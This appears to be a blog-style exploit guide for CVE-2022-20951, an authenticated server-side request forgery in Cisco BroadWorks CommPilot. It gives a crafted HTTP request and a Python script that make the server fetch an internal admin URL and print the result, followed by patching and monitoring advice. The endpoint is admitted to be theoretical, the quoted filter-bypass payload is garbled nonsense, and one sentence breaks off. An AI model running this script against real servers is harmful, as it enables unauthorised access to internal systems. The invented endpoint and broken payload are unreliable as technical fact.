CVE-2022-20951 - Dangerous SSRF in Cisco BroadWorks CommPilot — Exploit Details & Guide

In late 2022, details emerged of CVE-2022-20951, a severe security bug in Cisco’s BroadWorks CommPilot web management interface. This vulnerability made it possible for an attacker—after logging in—to send fake requests from the server itself to almost any internal resource. Let’s break down how this works, why it’s dangerous, and how a real-world attack might look.

What is CVE-2022-20951?

CVE-2022-20951 affects Cisco BroadWorks’ CommPilot application. It’s what’s known as a “server-side request forgery” (SSRF). Simply put, when a user-provided input isn’t checked well enough, it lets hackers make the server itself send requests wherever they want—sometimes even to internal systems or secret resources the attacker shouldn’t see.

Cisco’s Advisory:
- Cisco Security Advisory for CVE-2022-20951

Why SSRF is Dangerous

In most web apps, if you send data, the web app may use that data to fetch information from another site. A secure app filters what addresses you can use. But with SSRF, a hacker can send unfiltered requests—possibly to private IPs, checking internal systems, even getting files or secrets. If, for example, cloud metadata endpoints or admin consoles are open within the network, they could be accessed!

The Vulnerability in Plain English

Problem:
The CommPilot interface took user-supplied URLs (like for preview or download actions) and sent server-side requests without properly checking those URLs.

Triggering the Bug:
If an attacker logs in (even as a low-privilege user), they can craft a request that tricks the server into fetching information from a location of their choice — say, http://localhost:808/admin or an internal AWS metadata endpoint.

How Input Looked:
The input filter didn’t catch payloads like

{{value}} ["%7b%7bvalue%7d%7d"])}]]

or similar encoded payloads that could allow access to internal resources.

Step 1: Authentication

The attacker needs valid login credentials. (Phishing or social engineering could make this happen.)

Step 2: Craft a Malicious Request

The attacker sends a specially crafted HTTP request. For example, a vulnerable API endpoint might let them set a URL, which the server then fetches.

Example crafted request

POST /commpilot/preview HTTP/1.1
Host: cisco-broadworks.example.com
Cookie: SessionID=abcd1234
Content-Type: application/json

{
  "url": "http://localhost:808/admin"
}

Or, encoded payloads to bypass filters (using the vulnerable pattern)

{
  "url": "{{value}} [\"%7b%7bvalue%7d%7d\"])}]]"
}

The server receives this, does no sanitization, and makes the request itself—possibly to an internal-only network location.

Step 3: Harvest Internal Data

Whatever data the internal endpoint returns gets relayed back to the attacker—as if the server itself is leaking its secrets.

Below is a very basic example exploiting a theoretical vulnerable endpoint

import requests

# Change these as needed
HOST = 'https://cisco-broadworks.example.com';
LOGIN_COOKIE = {'SessionID': 'abcd1234'}

# SSRF payload - targeting local admin panel
target_url = 'http://localhost:808/admin'

data = {
    "url": target_url
}

response = requests.post(
    f'{HOST}/commpilot/preview',
    cookies=LOGIN_COOKIE,
    json=data,
    verify=False
)

print("Internal Data Gained:", response.text)

Read Internal Files: If internal web servers host secret files (configuration, passwords),

- Probe Internal APIs: Attack the company’s intranet, internal dashboards, or metadata endpoints,

What Cisco Says

Cisco confirmed this SSRF bug affected multiple versions of BroadWorks CommPilot. They issued a patch (refer to advisory above). Cisco strongly recommends updating all affected installations.

Patch ASAP:

Always apply Cisco’s latest updates. Check Cisco’s Advisory for directions.

Network Segmentation & Firewalls:

Internal resources (like admin panels or metadata endpoints) should not be accessible from the BroadWorks server, if possible.

Monitor Logs:

SSRF attacks often leave odd HTTP request traces in logs. Watch for unusual URL patterns (esp. to localhost or private IP space).

Official Advisory:

Cisco Security Advisory: SSRF in BroadWorks CommPilot (CVE-2022-20951)

NIST NVD Entry:

CVE-2022-20951 at NVD

Intro to SSRF:

PortSwigger: SSRF Explained

Final Thoughts

CVE-2022-20951 shows why web apps must always validate all user input, even from trusted users. SSRF is especially scary because it turns web servers into unwitting spies on their own networks. If you use Cisco BroadWorks CommPilot, patch now, and review your server-side request logic.

Timeline

Published on: 11/04/2022 18:15:00 UTC
Last modified on: 11/07/2022 15:57:00 UTC